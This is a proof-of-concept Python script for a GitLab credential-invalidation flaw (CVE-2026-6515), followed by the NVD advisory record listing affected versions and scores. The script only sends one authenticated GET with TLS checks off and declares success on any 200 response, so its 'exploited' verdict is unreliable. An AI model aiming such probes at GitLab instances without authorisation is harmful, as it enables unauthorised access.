CVE-2026-6515

import requests # CVE-2026-6515 Proof of Concept # Description: Attempt to access Virtual Registry with invalidated/scoped credentials. # Note: Replace TARGET_URL and TOKEN with actual testing values. TARGET_URL = "https://gitlab.example.com" # This token represents an invalidated or incorrectly scoped credential TOKEN = "glpat-invalid_or_scoped_token_example" headers = { "Authorization": f"Bearer {TOKEN}", "Content-Type": "application/json" } # Endpoint for Virtual Registry endpoint = f"{TARGET_URL}/api/v4/virtual_registries" try: response = requests.get(endpoint, headers=headers, verify=False) if response.status_code == 200: print("[+] Vulnerability Exploited! Access granted with invalid credentials.") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2026-6515", "sourceIdentifier": "[email protected]", "published": "2026-04-22T17:16:44.923", "lastModified": "2026-04-23T20:18:22.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2 before 18.9.6, 18.10 before 18.10.4, and 18.11 before 18.11.1 that could have allowed a user to use invalidated or incorrectly scoped credentials to access Virtual Registries under certain conditions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.2.0", "versionEndExcluding": "18.9.6", "matchCriteriaId": "290D3AC1-6A70-4070-98D0-A78A47B2AF59"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.2.0", "versionEndExcluding": "18.9.6", "matchCriteriaId": "11CFC80F-6935-49C1-B3C6-E6F80BE6A710"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.4", "matchCriteriaId": "98D16D9B-6A45-45F3-934B-3ED95C8371BF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.4", "matchCriteriaId": "58B8096F-9D7B-403D-B685-E9D4FA24F3E5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.11.0:*:*:*:community:*:*:*", "matchCriteriaId": "A6100523-821F-4F41-872D-AC5A60EECC19"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:18.11.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "C78F9577-CDD5-497B-A92F-3C578AC6709E"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/04/22/patch-release-gitlab-18-11-1-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/595993", "source": "[email protected]", "tags": ["Broken Link"]}]}}